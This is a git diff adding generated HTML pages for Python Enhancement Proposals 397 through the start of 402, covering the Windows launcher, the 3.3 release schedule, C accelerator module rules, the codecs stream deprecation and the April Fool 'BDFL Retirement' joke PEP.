If no minor version qualifiers are found, the environment variable +PY_PYTHON{major} (where {major} is the current major version qualifier +as determined above) can be set to specify the full version. If no such option +is found, the launcher will enumerate the installed Python versions and use +the latest minor release found for the major version, which is likely, +although not guaranteed, to be the most recently installed version in that +family.

+

In addition to environment variables, the same settings can be configured +in the .INI file used by the launcher. The section in the INI file is +called [defaults] and the key name will be the same as the +environment variables without the leading PY_ prefix (and note that +the key names in the INI file are case insensitive.) The contents of +an environment variable will override things specified in the INI file.

+
+
+

Command-line handling

+

Only the first command-line argument will be checked for a shebang line +and only if that argument does not start with a ‘-‘.

+

If the only command-line argument is “-h” or “–help”, the launcher will +print a small banner and command-line usage, then pass the argument to +the default Python. This will cause help for the launcher being printed +followed by help for Python itself. The output from the launcher will +clearly indicate the extended help information is coming from the +launcher and not Python.

+

As a concession to interactively launching Python, the launcher will +support the first command-line argument optionally being a dash (“-“) +followed by a version qualifier, as described above, to nominate a +specific version be used. For example, while “py.exe” may locate and +launch the latest Python 2.x implementation installed, a command-line such +as “py.exe -3” could specify the latest Python 3.x implementation be +launched, while “py.exe -2.6-32” could specify a 32bit implementation +Python 2.6 be located and launched. If a Python 2.x implementation is +desired to be launched with the -3 flag, the command-line would need to be +similar to “py.exe -2 -3” (or the specific version of Python could +obviously be launched manually without use of this launcher.) Note that +this feature can not be used with shebang processing as the file scanned +for a shebang line and this argument must both be the first argument and +therefore are mutually exclusive.

+

All other arguments will be passed untouched to the child Python process.

+
+
+

Process Launching

+

The launcher offers some conveniences for Python developers working +interactively - for example, starting the launcher with no command-line +arguments will launch the default Python with no command-line arguments. +Further, command-line arguments will be supported to allow a specific +Python version to be launched interactively - however, these conveniences +must not detract from the primary purpose of launching scripts and must +be easy to avoid if desired.

+

The launcher creates a subprocess to start the actual +interpreter. See Discussion below for the rationale.

+
+
+
+

Discussion

+

It may be surprising that the launcher is installed into the +Windows directory, and not the System32 directory. The reason is +that the System32 directory is not on the Path of a 32-bit process +running on a 64-bit system. However, the Windows directory is +always on the path.

+

The launcher that is installed into the Windows directory is a 32-bit +executable so that the 32-bit CPython installer can provide the same +binary for both 32-bit and 64-bit Windows installations.

+

Ideally, the launcher process would execute Python directly inside +the same process, primarily so the parent of the launcher process could +terminate the launcher and have the Python interpreter terminate. If the +launcher executes Python as a sub-process and the parent of the launcher +terminates the launcher, the Python process will be unaffected.

+

However, there are a number of practical problems associated with this +approach. Windows does not support the execv* family of Unix functions, +so this could only be done by the launcher dynamically loading the Python +DLL, but this would have a number of side-effects. The most serious +side effect of this is that the value of sys.executable would refer to the +launcher instead of the Python implementation. Many Python scripts use the +value of sys.executable to launch child processes, and these scripts may +fail to work as expected if the launcher is used. Consider a “parent” +script with a shebang line of ‘#! /usr/bin/python3’ which attempts to +launch a child script (with no shebang) via sys.executable - currently the +child is launched using the exact same version running the parent script. +If sys.executable referred to the launcher the child would be likely +executed using a Python 2.x version and would be likely to fail with a +SyntaxError.

+

Another hurdle is the support for alternative Python implementations +using the “customized commands” feature described above, where loading +the command dynamically into a running executable is not possible.

+

The final hurdle is the rules above regarding 64bit and 32bit programs - +a 32bit launcher would be unable to load the 64bit version of Python and +vice-versa.

+

Given these considerations, the launcher will execute its command in a +child process, remaining alive while the child process is executing, then +terminate with the same exit code as returned by the child. To address +concerns regarding the termination of the launcher not killing the child, +the Win32 Job API will be used to arrange so that the child process is +automatically killed when the parent is terminated (although children of +that child process will continue as is the case now.) As this Windows API +is available in Windows XP and later, this launcher will not work on +Windows 2000 or earlier.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0397.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0398/index.html b/pep-0398/index.html new file mode 100644 index 00000000000..1725859044d --- /dev/null +++ b/pep-0398/index.html @@ -0,0 +1,317 @@ + + + + + + + + PEP 398 – Python 3.3 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 398 – Python 3.3 Release Schedule

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
23-Mar-2011
+
Python-Version:
+
3.3
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.3. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.3 Release Managers: Georg Brandl, Ned Deily (3.3.7+)
  • +
  • Windows installers: Martin v. Löwis
  • +
  • Mac installers: Ronald Oussoren/Ned Deily
  • +
  • Documentation: Georg Brandl
  • +
+
+
+

3.3 Lifespan

+

3.3 will receive bugfix updates approximately every 4-6 months for +approximately 18 months. After the release of 3.4.0 final, a final +3.3 bugfix update will be released. After that, security updates +(source only) will be released until 5 years after the release of 3.3 +final, which will be September 2017.

+

As of 2017-09-29, Python 3.3.x reached end-of-life status.

+
+
+

Release Schedule

+
+

3.3.0 schedule

+
    +
  • 3.3.0 alpha 1: March 5, 2012
  • +
  • 3.3.0 alpha 2: April 2, 2012
  • +
  • 3.3.0 alpha 3: May 1, 2012
  • +
  • 3.3.0 alpha 4: May 31, 2012
  • +
  • 3.3.0 beta 1: June 27, 2012
  • +
+

(No new features beyond this point.)

+
    +
  • 3.3.0 beta 2: August 12, 2012
  • +
  • 3.3.0 candidate 1: August 24, 2012
  • +
  • 3.3.0 candidate 2: September 9, 2012
  • +
  • 3.3.0 candidate 3: September 24, 2012
  • +
  • 3.3.0 final: September 29, 2012
  • +
+
+
+

3.3.1 schedule

+
    +
  • 3.3.1 candidate 1: March 23, 2013
  • +
  • 3.3.1 final: April 6, 2013
  • +
+
+
+

3.3.2 schedule

+
    +
  • 3.3.2 final: May 13, 2013
  • +
+
+
+

3.3.3 schedule

+
    +
  • 3.3.3 candidate 1: October 27, 2013
  • +
  • 3.3.3 candidate 2: November 9, 2013
  • +
  • 3.3.3 final: November 16, 2013
  • +
+
+
+

3.3.4 schedule

+
    +
  • 3.3.4 candidate 1: January 26, 2014
  • +
  • 3.3.4 final: February 9, 2014
  • +
+
+
+

3.3.5 schedule

+

Python 3.3.5 was the last regular maintenance release before 3.3 entered +security-fix only mode.

+
    +
  • 3.3.5 candidate 1: February 22, 2014
  • +
  • 3.3.5 candidate 2: March 1, 2014
  • +
  • 3.3.5 final: March 8, 2014
  • +
+
+
+

3.3.6 schedule

+

Security fixes only

+
    +
  • 3.3.6 candidate 1 (source-only release): October 4, 2014
  • +
  • 3.3.6 final (source-only release): October 11, 2014
  • +
+
+
+

3.3.7 schedule

+

Security fixes only

+
    +
  • 3.3.7 candidate 1 (source-only release): September 6, 2017
  • +
  • 3.3.7 final (source-only release): September 19, 2017
  • +
+
+
+

3.3.x end-of-life

+
    +
  • September 29, 2017
  • +
+
+
+
+

Features for 3.3

+

Implemented / Final PEPs:

+
    +
  • PEP 362: Function Signature Object
  • +
  • PEP 380: Syntax for Delegating to a Subgenerator
  • +
  • PEP 393: Flexible String Representation
  • +
  • PEP 397: Python launcher for Windows
  • +
  • PEP 399: Pure Python/C Accelerator Module Compatibility Requirements
  • +
  • PEP 405: Python Virtual Environments
  • +
  • PEP 409: Suppressing exception context
  • +
  • PEP 412: Key-Sharing Dictionary
  • +
  • PEP 414: Explicit Unicode Literal for Python 3.3
  • +
  • PEP 415: Implement context suppression with exception attributes
  • +
  • PEP 417: Including mock in the Standard Library
  • +
  • PEP 418: Add monotonic time, performance counter, and process time functions
  • +
  • PEP 420: Implicit Namespace Packages
  • +
  • PEP 421: Adding sys.implementation
  • +
  • PEP 3118: Revising the buffer protocol (protocol semantics finalised)
  • +
  • PEP 3144: IP Address manipulation library
  • +
  • PEP 3151: Reworking the OS and IO exception hierarchy
  • +
  • PEP 3155: Qualified name for classes and functions
  • +
+

Other final large-scale changes:

+
    +
  • Addition of the “faulthandler” module
  • +
  • Addition of the “lzma” module, and lzma/xz support in tarfile
  • +
  • Implementing __import__ using importlib
  • +
  • Addition of the C decimal implementation
  • +
  • Switch of Windows build toolchain to VS 2010
  • +
+

Candidate PEPs:

+
    +
  • None
  • +
+

Other planned large-scale changes:

+
    +
  • None
  • +
+

Deferred to post-3.3:

+
    +
  • PEP 395: Qualified Names for Modules
  • +
  • PEP 3143: Standard daemon process library
  • +
  • PEP 3154: Pickle protocol version 4
  • +
  • Breaking out standard library and docs in separate repos
  • +
  • Addition of the “packaging” module, deprecating “distutils”
  • +
  • Addition of the “regex” module
  • +
  • Email version 6
  • +
  • A standard event-loop interface (PEP by Jim Fulton pending)
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0398.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0399/index.html b/pep-0399/index.html new file mode 100644 index 00000000000..1110f6df208 --- /dev/null +++ b/pep-0399/index.html @@ -0,0 +1,277 @@ + + + + + + + + PEP 399 – Pure Python/C Accelerator Module Compatibility Requirements | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 399 – Pure Python/C Accelerator Module Compatibility Requirements

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
04-Apr-2011
+
Python-Version:
+
3.3
+
Post-History:
+
04-Apr-2011, 12-Apr-2011, 17-Jul-2011, 15-Aug-2011, 01-Jan-2013
+
+
+
+
Table of Contents +
+
+

Abstract

+

The Python standard library under CPython contains various instances +of modules implemented in both pure Python and C (either entirely or +partially). This PEP requires that in these instances that the +C code must pass the test suite used for the pure Python code +so as to act as much as a drop-in replacement as reasonably possible +(C- and VM-specific tests are exempt). It is also required that new +C-based modules lacking a pure Python equivalent implementation get +special permission to be added to the standard library.

+
+
+

Rationale

+

Python has grown beyond the CPython virtual machine (VM). IronPython, +Jython, and PyPy are all currently viable alternatives to the +CPython VM. The VM ecosystem that has sprung up around the Python +programming language has led to Python being used in many different +areas where CPython cannot be used, e.g., Jython allowing Python to be +used in Java applications.

+

A problem all of the VMs other than CPython face is handling modules +from the standard library that are implemented (to some extent) in C. +Since other VMs do not typically support the entire C API of CPython +they are unable to use the code used to create the module. Oftentimes +this leads these other VMs to either re-implement the modules in pure +Python or in the programming language used to implement the VM itself +(e.g., in C# for IronPython). This duplication of effort between +CPython, PyPy, Jython, and IronPython is extremely unfortunate as +implementing a module at least in pure Python would help mitigate +this duplicate effort.

+

The purpose of this PEP is to minimize this duplicate effort by +mandating that all new modules added to Python’s standard library +must have a pure Python implementation unless special dispensation +is given. This makes sure that a module in the stdlib is available to +all VMs and not just to CPython (pre-existing modules that do not meet +this requirement are exempt, although there is nothing preventing +someone from adding in a pure Python implementation retroactively).

+

Re-implementing parts (or all) of a module in C (in the case +of CPython) is still allowed for performance reasons, but any such +accelerated code must pass the same test suite (sans VM- or C-specific +tests) to verify semantics and prevent divergence. To accomplish this, +the test suite for the module must have comprehensive coverage of the +pure Python implementation before the acceleration code may be added.

+
+
+

Details

+

Starting in Python 3.3, any modules added to the standard library must +have a pure Python implementation. This rule can only be ignored if +the Python development team grants a special exemption for the module. +Typically the exemption will be granted only when a module wraps a +specific C-based library (e.g., sqlite3). In granting an exemption it +will be recognized that the module will be considered exclusive to +CPython and not part of Python’s standard library that other VMs are +expected to support. Usage of ctypes to provide an +API for a C library will continue to be frowned upon as ctypes +lacks compiler guarantees that C code typically relies upon to prevent +certain errors from occurring (e.g., API changes).

+

Even though a pure Python implementation is mandated by this PEP, it +does not preclude the use of a companion acceleration module. If an +acceleration module is provided it is to be named the same as the +module it is accelerating with an underscore attached as a prefix, +e.g., _warnings for warnings. The common pattern to access +the accelerated code from the pure Python implementation is to import +it with an import *, e.g., from _warnings import *. This is +typically done at the end of the module to allow it to overwrite +specific Python objects with their accelerated equivalents. This kind +of import can also be done before the end of the module when needed, +e.g., an accelerated base class is provided but is then subclassed by +Python code. This PEP does not mandate that pre-existing modules in +the stdlib that lack a pure Python equivalent gain such a module. But +if people do volunteer to provide and maintain a pure Python +equivalent (e.g., the PyPy team volunteering their pure Python +implementation of the csv module and maintaining it) then such +code will be accepted. In those instances the C version is considered +the reference implementation in terms of expected semantics.

+

Any new accelerated code must act as a drop-in replacement as close +to the pure Python implementation as reasonable. Technical details of +the VM providing the accelerated code are allowed to differ as +necessary, e.g., a class being a type when implemented in C. To +verify that the Python and equivalent C code operate as similarly as +possible, both code bases must be tested using the same tests which +apply to the pure Python code (tests specific to the C code or any VM +do not follow under this requirement). The test suite is expected to +be extensive in order to verify expected semantics.

+

Acting as a drop-in replacement also dictates that no public API be +provided in accelerated code that does not exist in the pure Python +code. Without this requirement people could accidentally come to rely +on a detail in the accelerated code which is not made available to +other VMs that use the pure Python implementation. To help verify +that the contract of semantic equivalence is being met, a module must +be tested both with and without its accelerated code as thoroughly as +possible.

+

As an example, to write tests which exercise both the pure Python and +C accelerated versions of a module, a basic idiom can be followed:

+
from test.support import import_fresh_module
+import unittest
+
+c_heapq = import_fresh_module('heapq', fresh=['_heapq'])
+py_heapq = import_fresh_module('heapq', blocked=['_heapq'])
+
+
+class ExampleTest:
+
+    def test_example(self):
+        self.assertTrue(hasattr(self.module, 'heapify'))
+
+
+class PyExampleTest(ExampleTest, unittest.TestCase):
+    module = py_heapq
+
+
+@unittest.skipUnless(c_heapq, 'requires the C _heapq module')
+class CExampleTest(ExampleTest, unittest.TestCase):
+    module = c_heapq
+
+
+if __name__ == '__main__':
+    unittest.main()
+
+
+

The test module defines a base class (ExampleTest) with test methods +that access the heapq module through a self.heapq class attribute, +and two subclasses that set this attribute to either the Python or the C +version of the module. Note that only the two subclasses inherit from +unittest.TestCase – this prevents the ExampleTest class from +being detected as a TestCase subclass by unittest test discovery. +A skipUnless decorator can be added to the class that tests the C code +in order to have these tests skipped when the C module is not available.

+

If this test were to provide extensive coverage for +heapq.heappop() in the pure Python implementation then the +accelerated C code would be allowed to be added to CPython’s standard +library. If it did not, then the test suite would need to be updated +until proper coverage was provided before the accelerated C code +could be added.

+

To also help with compatibility, C code should use abstract APIs on +objects to prevent accidental dependence on specific types. For +instance, if a function accepts a sequence then the C code should +default to using PyObject_GetItem() instead of something like +PyList_GetItem(). C code is allowed to have a fast path if the +proper PyList_CheckExact() is used, but otherwise APIs should work +with any object that duck types to the proper interface instead of a +specific type.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0399.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0400/index.html b/pep-0400/index.html new file mode 100644 index 00000000000..287af913f86 --- /dev/null +++ b/pep-0400/index.html @@ -0,0 +1,465 @@ + + + + + + + + PEP 400 – Deprecate codecs.StreamReader and codecs.StreamWriter | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 400 – Deprecate codecs.StreamReader and codecs.StreamWriter

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
28-May-2011
+
Python-Version:
+
3.3
+
+
+
+
Table of Contents +
+
+

Abstract

+

io.TextIOWrapper and codecs.StreamReaderWriter offer the same API +[1]. TextIOWrapper has more features and is faster than +StreamReaderWriter. Duplicate code means that bugs should be fixed +twice and that we may have subtle differences between the two +implementations.

+

The codecs module was introduced in Python 2.0 (see the PEP 100). +The io module was +introduced in Python 2.6 and 3.0 (see the PEP 3116), +and reimplemented in C in +Python 2.7 and 3.1.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the PEP +and collecting and incorporating feedback, and with sufficient available +time to do so effectively.

+
+
+

Motivation

+

When the Python I/O model was updated for 3.0, the concept of a +“stream-with-known-encoding” was introduced in the form of +io.TextIOWrapper. As this class is critical to the performance of +text-based I/O in Python 3, this module has an optimised C version +which is used by CPython by default. Many corner cases in handling +buffering, stateful codecs and universal newlines have been dealt with +since the release of Python 3.0.

+

This new interface overlaps heavily with the legacy +codecs.StreamReader, codecs.StreamWriter and codecs.StreamReaderWriter +interfaces that were part of the original codec interface design in +PEP 100. These interfaces are organised around the principle of an +encoding with an associated stream (i.e. the reverse of arrangement in +the io module), so the original PEP 100 design required that codec +writers provide appropriate StreamReader and StreamWriter +implementations in addition to the core codec encode() and decode() +methods. This places a heavy burden on codec authors providing these +specialised implementations to correctly handle many of the corner +cases (see Appendix A) that have now been dealt with by io.TextIOWrapper. While deeper +integration between the codec and the stream allows for additional +optimisations in theory, these optimisations have in practice either +not been carried out and else the associated code duplication means +that the corner cases that have been fixed in io.TextIOWrapper are +still not handled correctly in the various StreamReader and +StreamWriter implementations.

+

Accordingly, this PEP proposes that:

+
    +
  • codecs.open() be updated to delegate to the builtin open() in Python +3.3;
  • +
  • the legacy codecs.Stream* interfaces, including the streamreader and +streamwriter attributes of codecs.CodecInfo be deprecated in Python +3.3.
  • +
+
+
+

Rationale

+
+

StreamReader and StreamWriter issues

+
    +
  • StreamReader is unable to translate newlines.
  • +
  • StreamWriter doesn’t support “line buffering” (flush if the input +text contains a newline).
  • +
  • StreamReader classes of the CJK encodings (e.g. GB18030) only +supports UNIX newlines (’\n’).
  • +
  • StreamReader and StreamWriter are stateful codecs but don’t expose +functions to control their state (getstate() or setstate()). Each +codec has to handle corner cases, see Appendix A.
  • +
  • StreamReader and StreamWriter are very similar to IncrementalReader +and IncrementalEncoder, some code is duplicated for stateful codecs +(e.g. UTF-16).
  • +
  • Each codec has to reimplement its own StreamReader and StreamWriter +class, even if it’s trivial (just call the encoder/decoder).
  • +
  • codecs.open(filename, “r”) creates an io.TextIOWrapper object.
  • +
  • No codec implements an optimized method in StreamReader or +StreamWriter based on the specificities of the codec.
  • +
+

Issues in the bug tracker:

+
    +
  • Issue #5445 (2009-03-08): +codecs.StreamWriter.writelines problem when passed generator
  • +
  • Issue #7262: (2009-11-04): +codecs.open() + eol (windows)
  • +
  • Issue #8260 (2010-03-29): +When I use codecs.open(…) and f.readline() follow up by f.read() +return bad result
  • +
  • Issue #8630 (2010-05-05): +Keepends param in codec readline(s)
  • +
  • Issue #10344 (2010-11-06): +codecs.readline doesn’t care buffering
  • +
  • Issue #11461 (2011-03-10): +Reading UTF-16 with codecs.readline() breaks on surrogate pairs
  • +
  • Issue #12446 (2011-06-30): +StreamReader Readlines behavior odd
  • +
  • Issue #12508 (2011-07-06): +Codecs Anomaly
  • +
  • Issue #12512 (2011-07-07): +codecs: StreamWriter issues with stateful codecs after a seek or +with append mode
  • +
  • Issue #12513 (2011-07-07): +codec.StreamReaderWriter: issues with interlaced read-write
  • +
+
+
+

TextIOWrapper features

+
    +
  • TextIOWrapper supports any kind of newline, including translating +newlines (to UNIX newlines), to read and write.
  • +
  • TextIOWrapper reuses codecs incremental encoders and decoders (no +duplication of code).
  • +
  • The io module (TextIOWrapper) is faster than the codecs module +(StreamReader). It is implemented in C, whereas codecs is +implemented in Python.
  • +
  • TextIOWrapper has a readahead algorithm which speeds up small +reads: read character by character or line by line (io is 10x +through 25x faster than codecs on these operations).
  • +
  • TextIOWrapper has a write buffer.
  • +
  • TextIOWrapper.tell() is optimized.
  • +
  • TextIOWrapper supports random access (read+write) using a single +class which permit to optimize interlaced read-write (but no such +optimization is implemented).
  • +
+
+
+

TextIOWrapper issues

+
    +
  • Issue #12215 (2011-05-30): +TextIOWrapper: issues with interlaced read-write
  • +
+
+
+

Possible improvements of StreamReader and StreamWriter

+

By adding codec state read/write functions to the StreamReader and +StreamWriter classes, it will become possible to fix issues with +stateful codecs in a base class instead of in each stateful +StreamReader and StreamWriter classes.

+

It would be possible to change StreamReader and StreamWriter to make +them use IncrementalDecoder and IncrementalEncoder.

+

A codec can implement variants which are optimized for the specific +encoding or intercept certain stream methods to add functionality or +improve the encoding/decoding performance. TextIOWrapper cannot +implement such optimization, but TextIOWrapper uses incremental +encoders and decoders and uses read and write buffers, so the overhead +of incomplete inputs is low or nul.

+

A lot more could be done for other variable length encoding codecs, +e.g. UTF-8, since these often have problems near the end of a read due +to missing bytes. The UTF-32-BE/LE codecs could simply multiply the +character position by 4 to get the byte position.

+
+
+

Usage of StreamReader and StreamWriter

+

These classes are rarely used directly, but indirectly using +codecs.open(). They are not used in Python 3 standard library (except +in the codecs module).

+

Some projects implement their own codec with StreamReader and +StreamWriter, but don’t use these classes.

+
+
+
+

Backwards Compatibility

+
+

Keep the public API, codecs.open

+

codecs.open() can be replaced by the builtin open() function. open() +has a similar API but has also more options. Both functions return +file-like objects (same API).

+

codecs.open() was the only way to open a text file in Unicode mode +until Python 2.6. Many Python 2 programs uses this function. Removing +codecs.open() implies more work to port programs from Python 2 to +Python 3, especially projects using the same code base for the two +Python versions (without using 2to3 program).

+

codecs.open() is kept for backward compatibility with Python 2.

+
+
+

Deprecate StreamReader and StreamWriter

+

Instantiating StreamReader or StreamWriter must emit a DeprecationWarning in +Python 3.3. Defining a subclass doesn’t emit a DeprecationWarning.

+

codecs.open() will be changed to reuse the builtin open() function +(TextIOWrapper) to read-write text files.

+
+
+
+

Alternative Approach

+

An alternative to the deprecation of the codecs.Stream* classes is to rename +codecs.open() to codecs.open_stream(), and to create a new codecs.open() +function reusing open() and so io.TextIOWrapper.

+
+
+

Appendix A: Issues with stateful codecs

+

It is difficult to use correctly a stateful codec with a stream. Some +cases are supported by the codecs module, while io has no more known +bug related to stateful codecs. The main difference between the codecs +and the io module is that bugs have to be fixed in StreamReader and/or +StreamWriter classes of each codec for the codecs module, whereas bugs +can be fixed only once in io.TextIOWrapper. Here are some examples of +issues with stateful codecs.

+
+

Stateful codecs

+

Python supports the following stateful codecs:

+
    +
  • cp932
  • +
  • cp949
  • +
  • cp950
  • +
  • euc_jis_2004
  • +
  • euc_jisx2003
  • +
  • euc_jp
  • +
  • euc_kr
  • +
  • gb18030
  • +
  • gbk
  • +
  • hz
  • +
  • iso2022_jp
  • +
  • iso2022_jp_1
  • +
  • iso2022_jp_2
  • +
  • iso2022_jp_2004
  • +
  • iso2022_jp_3
  • +
  • iso2022_jp_ext
  • +
  • iso2022_kr
  • +
  • shift_jis
  • +
  • shift_jis_2004
  • +
  • shift_jisx0213
  • +
  • utf_8_sig
  • +
  • utf_16
  • +
  • utf_32
  • +
+
+
+

Read and seek(0)

+
with open(filename, 'w', encoding='utf-16') as f:
+    f.write('abc')
+    f.write('def')
+    f.seek(0)
+    assert f.read() == 'abcdef'
+    f.seek(0)
+    assert f.read() == 'abcdef'
+
+
+

The io and codecs modules support this usecase correctly.

+
+
+

seek(n)

+
with open(filename, 'w', encoding='utf-16') as f:
+    f.write('abc')
+    pos = f.tell()
+with open(filename, 'w', encoding='utf-16') as f:
+    f.seek(pos)
+    f.write('def')
+    f.seek(0)
+    f.write('###')
+with open(filename, 'r', encoding='utf-16') as f:
+    assert f.read() == '###def'
+
+
+

The io module supports this usecase, whereas codecs fails because it +writes a new BOM on the second write (issue #12512).

+
+
+

Append mode

+
with open(filename, 'w', encoding='utf-16') as f:
+    f.write('abc')
+with open(filename, 'a', encoding='utf-16') as f:
+    f.write('def')
+with open(filename, 'r', encoding='utf-16') as f:
+    assert f.read() == 'abcdef'
+
+
+

The io module supports this usecase, whereas codecs fails because it +writes a new BOM on the second write (issue #12512).

+
+
+ + +
+

Footnotes

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0400.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0401/index.html b/pep-0401/index.html new file mode 100644 index 00000000000..c20dd4b20bc --- /dev/null +++ b/pep-0401/index.html @@ -0,0 +1,223 @@ + + + + + + + + PEP 401 – BDFL Retirement | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 401 – BDFL Retirement

+
+
Author:
+
Barry Warsaw, Brett Cannon
+
Status:
+
April Fool!
+
Type:
+
Process
+
Created:
+
01-Apr-2009
+
Post-History:
+
01-Apr-2009
+
+
+
+
Table of Contents +
+
+

Abstract

+

The BDFL, having shepherded Python development for 20 years, +officially announces his retirement, effective immediately. Following +a unanimous vote, his replacement is named.

+
+
+

Rationale

+

Guido wrote the original implementation of Python in 1989, and after +nearly 20 years of leading the community, has decided to step aside as +its Benevolent Dictator For Life. His official title is now +Benevolent Dictator Emeritus Vacationing Indefinitely from the +Language (BDEVIL). Guido leaves Python in the good hands of its new +leader and its vibrant community, in order to train for his lifelong +dream of climbing Mount Everest.

+

After unanimous vote of the Python Steering Union (not to be confused +with the Python Secret Underground, which emphatically does not exist) +at the 2009 Python Conference (PyCon 2009), Guido’s successor has been +chosen: Barry Warsaw, or as he is affectionately known, Uncle Barry. +Uncle Barry’s official title is Friendly Language Uncle For Life (FLUFL).

+
+
+

Official Acts of the FLUFL

+

FLUFL Uncle Barry enacts the following decisions, in order to +demonstrate his intention to lead the community in the same +responsible and open manner as his predecessor, whose name escapes +him:

+
    +
  • Recognized that the selection of Hg as the DVCS of choice was +clear proof of the onset of the BDEVIL’s insanity, and reverting +this decision to switch to Bzr instead, the only true choice.
  • +
  • Recognized that the != inequality operator in Python 3.0 was a +horrible, finger pain inducing mistake, the FLUFL reinstates the +<> diamond operator as the sole spelling. This change is +important enough to be implemented for, and released in Python +3.1. To help transition to this feature, a new future statement, +from __future__ import barry_as_FLUFL has been added.
  • +
  • Recognized that the print function in Python 3.0 was a horrible, +pain-inducing mistake, the FLUFL reinstates the print +statement. This change is important enough to be implemented for, +and released in Python 3.0.2.
  • +
  • Recognized that the disappointing adoption curve of Python 3.0 +signals its abject failure, all work on Python 3.1 and subsequent +Python 3.x versions is hereby terminated. All features in Python +3.0 shall be back ported to Python 2.7 which will be the official +and sole next release. The Python 3.0 string and bytes types will +be back ported to Python 2.6.2 for the convenience of developers.
  • +
  • Recognized that C is a 20th-century language with almost universal +rejection by programmers under the age of 30, the CPython +implementation will terminate with the release of Python 2.6.2 and +3.0.2. Thereafter, the reference implementation of Python will +target the Parrot [1] virtual machine. Alternative implementations +of Python (e.g. Jython [2], IronPython [3], and PyPy [4]) are +officially discouraged but tolerated.
  • +
  • Recognized that the Python Software Foundation [5] having fulfilled +its mission admirably, is hereby disbanded. The Python Steering +Union [6] (not to be confused with the Python Secret Underground, +which emphatically does not exist), is now the sole steward for all +of Python’s intellectual property. All PSF funds are hereby +transferred to the PSU (not that PSU, the other PSU).
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0401.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0402/index.html b/pep-0402/index.html new file mode 100644 index 00000000000..d1f7a1214ae --- /dev/null +++ b/pep-0402/index.html @@ -0,0 +1,703 @@ + + + + + + + + PEP 402 – Simplified Package Layout and Partitioning | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 402 – Simplified Package Layout and Partitioning

+
+
Author:
+
Phillip J. Eby
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
12-Jul-2011
+
Python-Version:
+
3.3
+
Post-History:
+
20-Jul-2011
+
Replaces:
+
382
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

On the first day of sprints at US PyCon 2012 we had a long and +fruitful discussion about PEP 382 and PEP 402. We ended up rejecting +both but a new PEP will be written to carry on in the spirit of PEP +402. Martin von Löwis wrote up a summary: [3].

+
+
+

Abstract

+

This PEP proposes an enhancement to Python’s package importing +to:

+
    +
  • Surprise users of other languages less,
  • +
  • Make it easier to convert a module into a package, and
  • +
  • Support dividing packages into separately installed components +(ala “namespace packages”, as described in PEP 382)
  • +
+

The proposed enhancements do not change the semantics of any +currently-importable directory layouts, but make it possible for +packages to use a simplified directory layout (that is not importable +currently).

+

However, the proposed changes do NOT add any performance overhead to +the importing of existing modules or packages, and performance for the +new directory layout should be about the same as that of previous +“namespace package” solutions (such as pkgutil.extend_path()).

+
+
+

The Problem

+
+
“Most packages are like modules. Their contents are highly +interdependent and can’t be pulled apart. [However,] some +packages exist to provide a separate namespace. … It should +be possible to distribute sub-packages or submodules of these +[namespace packages] independently.”

—Jim Fulton, shortly before the release of Python 2.3 [1]

+
+

When new users come to Python from other languages, they are often +confused by Python’s package import semantics. At Google, for example, +Guido received complaints from “a large crowd with pitchforks” [2] +that the requirement for packages to contain an __init__ module +was a “misfeature”, and should be dropped.

+

In addition, users coming from languages like Java or Perl are +sometimes confused by a difference in Python’s import path searching.

+

In most other languages that have a similar path mechanism to Python’s +sys.path, a package is merely a namespace that contains modules +or classes, and can thus be spread across multiple directories in +the language’s path. In Perl, for instance, a Foo::Bar module +will be searched for in Foo/ subdirectories all along the module +include path, not just in the first such subdirectory found.

+

Worse, this is not just a problem for new users: it prevents anyone +from easily splitting a package into separately-installable +components. In Perl terms, it would be as if every possible Net:: +module on CPAN had to be bundled up and shipped in a single tarball!

+

